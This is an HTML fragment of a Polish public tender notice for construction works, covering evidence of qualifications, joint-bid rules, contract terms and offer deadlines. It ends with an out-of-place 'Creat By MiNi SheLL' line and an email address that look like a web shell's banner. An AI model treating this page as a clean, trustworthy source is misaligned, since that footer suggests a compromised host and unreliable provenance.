ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania<br/>kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (jt. Dz.U. z<br/>2020, poz. 220 z późn.zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 273 ust 1 Ustawy PZP oraz z § 3 Rozporządzenia Ministra Rozwoju, Pracy i Technologii<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może<br/>żądać zamawiający od wykonawcy z dnia 23 grudnia 2020 r., W postępowaniach o wartości mniejszej<br/>niż progi unijne zamawiający, w celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału<br/>w postępowaniu, może zamiast podmiotowych środków dowodowych, o których mowa w § 2 ust. 1 pkt<br/>1, 2 lub 4–6, żądać oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) wykaz robót budowlanych, zgodny ze wzorem zamieszczonym w<br/>załączniku nr 4 do SWZ, wykonanych nie wcześniej niż w okresie ostatnich 5 lat od dnia, w którym<br/>upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne<br/>odpowiednie dokumenty<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych faktycznie<br/>przez niego wykonanych.<br/>2) wykaz osób, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, skierowanych przezwykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, i<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 34.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno<br/>być załączone do oferty.<br/>34.2. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>34.3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>- oświadczenia wstępne składa z ofertą każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>- zobowiązani są oni na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe,<br/>składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>- Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy.<br/>34.4. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną<br/>odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia określoną w art. 366<br/>Kodeksu Cywilnego.<br/>34.5. W formularzu OFERTA należy zaznaczyć, że oferta jest składana wspólnie oraz wpisać<br/>dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-25 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiatswidnik.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-25 12:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com